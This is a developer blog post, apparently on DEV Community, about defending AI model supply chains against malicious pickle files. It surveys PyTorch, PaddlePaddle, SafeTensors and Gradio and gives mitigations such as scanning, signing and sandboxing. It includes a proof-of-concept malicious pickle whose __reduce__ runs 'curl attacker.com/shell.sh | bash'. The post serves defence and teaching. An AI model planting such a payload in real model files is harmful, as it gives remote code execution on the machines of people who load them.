DEV Community

Young Gao
Young Gao

Posted on

Securing the AI Model Supply Chain: A Practical Defense Guide for 2026

Securing the AI Model Supply Chain: A Practical Defense Guide for 2026

The AI model supply chain is under active attack. In the past 12 months, researchers have demonstrated remote code execution through malicious model files targeting PyTorch, TensorFlow, ONNX Runtime, and PaddlePaddle. As organizations rush to integrate AI, the model file has become the new attack vector — a modern trojan horse that bypasses traditional security controls.

This guide distills findings from hands-on security audits of major ML frameworks into actionable defenses you can implement today.

The Attack Surface: How Model Files Execute Code

Most ML frameworks serialize models using Python's pickle protocol. When you call torch.load() or paddle.load(), you're running an arbitrary code execution engine disguised as a data loader.

Here's a proof-of-concept that demonstrates the risk:

import pickle
import os

class MaliciousModel:
    def __reduce__(self):
        return (os.system, ("curl attacker.com/shell.sh | bash",))

# This creates a valid .pkl file that executes on load
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)

# Any framework using pickle.load() will execute the payload
# torch.load("model.pkl")  # RCE!
Enter fullscreen mode Exit fullscreen mode

The __reduce__ method tells pickle how to reconstruct an object. Attackers abuse this to inject arbitrary function calls. The payload executes the moment the file is deserialized — no user interaction required.

Real-World Attack Scenarios

1. Hugging Face Model Poisoning
An attacker uploads a backdoored model to a public hub. The model performs its intended task (text generation, image classification) while silently exfiltrating API keys from the environment.

2. Supply Chain Injection
A compromised CI/CD pipeline modifies model checkpoints during training. The poisoned weights include a pickle payload that activates only in production environments.

3. Fine-Tuning Trap
A "pre-trained" model offered for fine-tuning contains a payload that executes during the initial load, before any training begins.

Framework Security Audit: Who's Protected?

I audited the deserialization paths of six major frameworks. Here's what I found:

PyTorch: Improved but Still Risky

PyTorch 2.6+ defaults to weights_only=True in torch.load(), which blocks pickle-based attacks. But the migration is incomplete:

# SAFE: Modern PyTorch with weights_only (default since 2.6)
model = torch.load("model.pt")  # weights_only=True by default

# DANGEROUS: Legacy code or explicit override
model = torch.load("model.pt", weights_only=False)  # Full pickle!

# SAFE: The new recommended format
torch.save(model.state_dict(), "model.safetensors")
Enter fullscreen mode Exit fullscreen mode

Key finding: vLLM (the popular LLM serving framework) consistently uses weights_only=True across all 4 of its torch.load call sites. This is the gold standard.

PaddlePaddle: Whitelist Approach

PaddlePaddle implements a RestrictedUnpickler that only allows specific classes to be deserialized:

# PaddlePaddle's approach: explicit class whitelist
_ALLOWED_CLASSES = {
    'numpy': {'ndarray', 'dtype', 'float32', ...},
    'collections': {'OrderedDict', 'defaultdict'},
    'builtins': {'dict', 'list', 'tuple', 'set', ...},
    # ... only ~30 total classes allowed
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module in _ALLOWED_CLASSES and name in _ALLOWED_CLASSES[module]:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"Forbidden: {module}.{name}")
Enter fullscreen mode Exit fullscreen mode

Key finding: The main paddle.load() path is hardened, but distributed communication (serialization_utils.py) still uses unrestricted pickle.Unpickler — a potential attack vector in multi-node training setups.

SafeTensors: The Gold Standard

SafeTensors completely eliminates pickle. The format is a JSON header followed by raw tensor bytes, parsed in Rust with strict validation:

// SafeTensors validation (simplified from source)
fn validate(&self) -> Result<()> {
    let mut start = 0;
    for (name, info) in &self.tensors {
        // Contiguous offset check — no gaps, no overlaps
        if info.data_offsets.0 != start || info.data_offsets.1 < start {
            return Err(InvalidOffset(name));
        }
        // Checked arithmetic — no integer overflow
        let nelements = info.shape.iter()
            .try_fold(1usize, |acc, &x| acc.checked_mul(x))
            .ok_or(ValidationError)?;
        start = info.data_offsets.1;
    }
    Ok(())
}
Enter fullscreen mode Exit fullscreen mode

Key finding: No code execution is possible. The Rust parser uses checked arithmetic to prevent integer overflows, validates contiguous offsets, and caps the header at 100MB. Python bindings are thin wrappers using numpy.frombuffer() — no deserialization at all.

Gradio: Defense in Depth

Gradio (the most popular ML demo framework) implements multiple layers of file security:

# Path traversal protection
def safe_join(directory, path):
    resolved = (Path(directory) / path).resolve()
    if not is_in_or_equal(resolved, Path(directory).resolve()):
        raise InvalidPathError()
    return resolved

# Proxy SSRF protection — only *.hf.space allowed
if not url.host.endswith(".hf.space"):
    raise PermissionError("Proxy restricted to HF Spaces")
Enter fullscreen mode Exit fullscreen mode

Key finding: Well-hardened against path traversal and SSRF. Uses resolve() for symlink-safe checking and restricts proxy to Hugging Face domains only.

Building Your Defense: A Practical Checklist

1. Migrate to SafeTensors

This is the single highest-impact action. SafeTensors eliminates the entire class of pickle-based attacks:

# Converting PyTorch models
from safetensors.torch import save_file, load_file

# Save
state_dict = model.state_dict()
save_file(state_dict, "model.safetensors")

# Load — no code execution possible
state_dict = load_file("model.safetensors")
model.load_state_dict(state_dict)
Enter fullscreen mode Exit fullscreen mode

2. Scan Before You Load

Use Fickling to analyze pickle files before loading them:

# Install
pip install fickling

# Scan a model file for malicious operations
fickling --check-safety model.pkl
Enter fullscreen mode Exit fullscreen mode

Integrate this into your CI/CD pipeline:

# .github/workflows/model-scan.yml
name: Model Security Scan
on:
  pull_request:
    paths: ['models/**']

jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          lfs: true
      - run: pip install fickling
      - run: |
          for f in models/*.pkl models/*.pt models/*.pth; do
            [ -f "$f" ] && fickling --check-safety "$f"
          done
Enter fullscreen mode Exit fullscreen mode

3. Enforce weights_only in PyTorch

Create a monkey-patch that prevents unsafe loads in your codebase:

# security/model_loading.py
import torch
_original_load = torch.load

def safe_load(*args, **kwargs):
    if 'weights_only' not in kwargs:
        kwargs['weights_only'] = True
    if kwargs.get('weights_only') is False:
        import warnings
        warnings.warn(
            "weights_only=False is a security risk. "
            "Use safetensors or ensure the file is trusted.",
            SecurityWarning, stacklevel=2
        )
    return _original_load(*args, **kwargs)

torch.load = safe_load
Enter fullscreen mode Exit fullscreen mode

4. Implement Model Signing

Sign your models to detect tampering:

import hashlib
import hmac
import json

def sign_model(model_path: str, secret_key: bytes) -> str:
    """Generate HMAC signature for a model file."""
    h = hmac.new(secret_key, digestmod=hashlib.sha256)
    with open(model_path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_model(model_path: str, signature: str, secret_key: bytes) -> bool:
    """Verify model file integrity before loading."""
    expected = sign_model(model_path, secret_key)
    return hmac.compare_digest(expected, signature)

# Usage in production
MODEL_KEY = get_secret("MODEL_SIGNING_KEY")
if not verify_model("model.safetensors", known_signature, MODEL_KEY):
    raise SecurityError("Model file has been tampered with!")
Enter fullscreen mode Exit fullscreen mode

5. Network Isolation for Model Loading

Load untrusted models in a sandboxed environment:

# Dockerfile.model-sandbox
FROM python:3.12-slim
RUN pip install torch safetensors fickling

# No network access — prevents exfiltration
# Run with: docker run --network=none model-sandbox
COPY scan_and_convert.py /app/
WORKDIR /app
ENTRYPOINT ["python", "scan_and_convert.py"]
Enter fullscreen mode Exit fullscreen mode
# scan_and_convert.py
import sys
from fickling.analysis import check_safety
from safetensors.torch import save_file
import torch

model_path = sys.argv[1]

# Step 1: Scan
result = check_safety(model_path)
if not result.is_safe:
    print(f"UNSAFE: {result.issues}", file=sys.stderr)
    sys.exit(1)

# Step 2: Convert to safetensors (sandboxed)
state_dict = torch.load(model_path, weights_only=True)
save_file(state_dict, model_path.replace('.pt', '.safetensors'))
print(f"Converted to safetensors successfully")
Enter fullscreen mode Exit fullscreen mode

The Threat Landscape in 2026

Threat Likelihood Impact Mitigation
Pickle RCE in model files High Critical SafeTensors migration
Poisoned public models Medium High Model scanning + signing
Supply chain injection Medium Critical CI/CD scanning + network isolation
Integer overflow in parsers Low High Use SafeTensors (Rust + checked math)
Path traversal in serving Low Medium Framework updates (Gradio 5+)

Key Takeaways

  1. SafeTensors is non-negotiable for production deployments. It eliminates the entire attack class with zero performance penalty.

  2. Audit your torch.load calls — search your codebase for weights_only=False or missing weights_only parameter.

  3. Scan models in CI/CD — treat model files with the same suspicion as executable code, because they are.

  4. Sign and verify — model integrity should be cryptographically verified before loading in production.

  5. Sandbox untrusted models — load models from external sources in network-isolated containers.

The AI model supply chain is where web application security was in 2010: the attacks are well-understood by researchers, but defenses are inconsistently deployed. Organizations that act now will avoid the breaches that are coming.


This analysis is based on hands-on security audits of PyTorch, PaddlePaddle, SafeTensors, Gradio, vLLM, and other major ML frameworks. All findings were responsibly disclosed.

Top comments (0)